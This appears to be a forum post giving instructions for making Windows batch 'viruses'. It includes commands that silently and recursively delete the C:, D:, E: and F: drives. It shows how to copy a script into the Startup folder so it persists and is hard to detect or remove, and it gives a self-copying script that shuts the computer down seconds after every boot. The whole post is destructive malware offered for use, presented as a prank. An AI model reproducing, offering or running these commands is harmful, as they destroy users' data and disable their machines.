- One more ...
try one this
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q
then it is complete Save as any file you want in .bat format.. n enjoy lol..its really dangerous dont try on your own pc.
How to add ur own created viruses into start ups this will make it diifcult to detect them n to remove them ...
1) For this u can use the simple code below ..
@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
n den rest of the code ..
2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..
@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
@echo off
shutdown -s -t 5 -c "Shutdown"
save it as abcd.bat when ever u will run it it will be saved in ur start ups..
here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol